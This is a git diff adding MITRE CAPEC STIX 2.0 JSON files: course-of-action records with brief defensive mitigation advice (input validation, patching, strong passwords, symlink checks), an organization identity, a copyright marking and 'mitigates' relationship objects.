@@ -0,0 +1,20 @@ +{ + "id": "bundle--1a7926a3-20c4-4176-b406-1f06fcce29c2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use SSL, as all SSL versions have been broken and should not be used. If TLS is not an option for the client or server, consider setting timeouts on SSL sessions to extremely low values to lessen the potential impact.", + "id": "course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec.json new file mode 100644 index 0000000000000000000000000000000000000000..17e12f0a11d0ca7ae4a292becd1b0fb232fa46ca --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--0bec8fae-cc3f-4ea6-989b-14d100db29e7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-virus products to detect and quarantine software with known virus.", + "id": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-442-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220.json new file mode 100644 index 0000000000000000000000000000000000000000..52c26019078213b066b7ac79958b4b9f86f05888 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--6981ded8-df85-471f-b1a1-8c5477f26bf0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use load balancing mechanisms", + "id": "course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-469-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f5210720-4324-4516-a229-f892a14476e3.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f5210720-4324-4516-a229-f892a14476e3.json new file mode 100644 index 0000000000000000000000000000000000000000..c730b39540f77f0ea5e760155d34a866f2fbdda8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f5210720-4324-4516-a229-f892a14476e3.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--f3d0ea34-6f1b-433c-bfed-d423e73465f6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.", + "id": "course-of-action--f5210720-4324-4516-a229-f892a14476e3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-132-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8.json new file mode 100644 index 0000000000000000000000000000000000000000..e64ca7c1b372a08d146ebfedd77925bdef17ddaa --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--f6a37ddb-253f-4a35-8ba9-a4f4a5bca6c2", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a Software Assurance Plan that includes maintaining strict configuration management control of source code, object code and software development, build and distribution tools; manual code reviews and static code analysis for developmental software; and tracking of all storage and movement of code.", + "id": "course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371.json new file mode 100644 index 0000000000000000000000000000000000000000..8c2bc7dd6cd3a604b0fc1f964dbdba191154eae5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--9622b385-6784-4cfe-8fc7-50bb870e75aa", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests", + "id": "course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json new file mode 100644 index 0000000000000000000000000000000000000000..20e964e35d780e9a722f00bd83de6843c7a91dfd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--ab044d1b-b641-4c8b-86bf-d789a8988dd4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework", + "id": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json new file mode 100644 index 0000000000000000000000000000000000000000..76ad28470211473602e958517f4749929c0d839d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--fe7566f1-8e07-4f50-9a15-773a7b0bc9c3", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain multiple instances of the document across different privileged users for recovery and verification.", + "id": "course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-519-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json new file mode 100644 index 0000000000000000000000000000000000000000..2d25c817d4f092f0f18e0aaa82dc82a481558607 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--fd074c08-b558-4f44-9324-59884001bdfd", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.", + "id": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json new file mode 100644 index 0000000000000000000000000000000000000000..20120056171a6731c5fe2725b1f3a442b17f4be9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c07965c7-85b8-4548-9f03-3ee83ef4c7bb", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for all content.", + "id": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json new file mode 100644 index 0000000000000000000000000000000000000000..b2d23694c2cebe6a1f6d5559b8df67d7a49497ca --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--9b7b913d-8808-43cf-93d0-f04f51519a72", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Change default passwords by choosing strong passwords.", + "id": "course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-169-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json new file mode 100644 index 0000000000000000000000000000000000000000..ca99f34fb122e65c2e1b08b25b15c8cc9a402b3b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--79f97475-6499-4112-b864-4e6aa65e81c0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.", + "id": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json new file mode 100644 index 0000000000000000000000000000000000000000..f33e536fcbb7dbfa938b59acf7d183c78180c2ad --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c8d5fdeb-544e-42dd-87bd-5dced70b7e44", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design the communication system such that it associates proper authentication/authorization with each channel/message.", + "id": "course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json new file mode 100644 index 0000000000000000000000000000000000000000..902f3f45247ee0c636abf10ff3da9ec5e18e8cc8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--1f8a2ee9-1b4f-487b-b7eb-15d53152d47b", + "objects": [ + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Use an allowlist of acceptable classes.\n ", + "id": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json new file mode 100644 index 0000000000000000000000000000000000000000..2e7a8aec17e3d1c006a59201f756af48d664b914 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--f43bdb0a-9101-4506-bca1-ced2d4e117b4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor traffic and resource usage and pay attention if resource exhaustion occurs.", + "id": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--feb21138-cc49-427c-a020-0515522bd9d7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--feb21138-cc49-427c-a020-0515522bd9d7.json new file mode 100644 index 0000000000000000000000000000000000000000..93f22661d02be07386d7eafd45de8ade3a4175e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--feb21138-cc49-427c-a020-0515522bd9d7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--48c3bdde-5746-4e5b-9d04-20c3388cb6cf", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make use of OTA (Over-the-air) updates so that firmware can be patched remotely either through manual or automatic means", + "id": "course-of-action--feb21138-cc49-427c-a020-0515522bd9d7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-682-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json new file mode 100644 index 0000000000000000000000000000000000000000..f122e4435a62c362840b014f604e60db4730370d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--092313f6-c871-43ff-aa09-fb55df0fc04a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys.", + "id": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json new file mode 100644 index 0000000000000000000000000000000000000000..f6c2698b7286744c019fe6a26be26429155806fe --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--aca9c5a4-d85c-43b9-9b67-6e6038724826", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate all untrusted data.", + "id": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json b/cti-ATT-CK-v13.1/capec/2.0/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json new file mode 100644 index 0000000000000000000000000000000000000000..51a0628ab2bb11f46708a1d29dbc8011ca6dfdad --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json @@ -0,0 +1,18 @@ +{ + "id": "bundle--436fd92b-159d-48e5-a990-a7df3974035e", + "objects": [ + { + "created": "2023-01-30T20:31:22.121Z", + "id": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "identity_class": "organization", + "modified": "2023-01-30T20:31:22.121Z", + "name": "The MITRE Corporation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "identity" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json b/cti-ATT-CK-v13.1/capec/2.0/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json new file mode 100644 index 0000000000000000000000000000000000000000..f60e79f1a61a391fc77c7dfaec4f6e01653ac1cb --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.0/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json @@ -0,0 +1,16 @@ +{ + "id": "bundle--b31f6f83-0a45-4e15-9146-94eef3f70eb4", + "objects": [ + { + "created": "2023-01-30T20:31:22.120362Z", + "definition": { + "statement": "CAPEC is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security. Copyright © 2007 - 2023, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation." + }, + "definition_type": "statement", + "id": "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d", + "type": "marking-definition" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json new file mode 100644 index 0000000000000000000000000000000000000000..d73a8b0a14ccd2f72aff863d9ada4c6522217310 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--2137b252-d78a-41e8-8b4e-db821177ee7a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json new file mode 100644 index 0000000000000000000000000000000000000000..545a9240a44815c684ef61232848cc94019430c9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--eda37305-3abd-4464-9277-ebf624c41cba", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002041eb-05e7-4cd3-ba28-e881bb148370", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json new file mode 100644 index 0000000000000000000000000000000000000000..252cf9554383090f3e9a23fb0ad799243aa663a7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--211e98d3-76bf-4d2f-bdac-f65566edcc69", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002a4543-59cc-405d-b6f7-835ee0f6b124", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json new file mode 100644 index 0000000000000000000000000000000000000000..78c136e7b9bda5dfbb1fad4a1f5044cbb93e39ed --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--814a7eff-4b86-46d2-ab56-3409ef3d6b3e", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00382075-fd38-4145-ac07-88fa46ab5e82", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
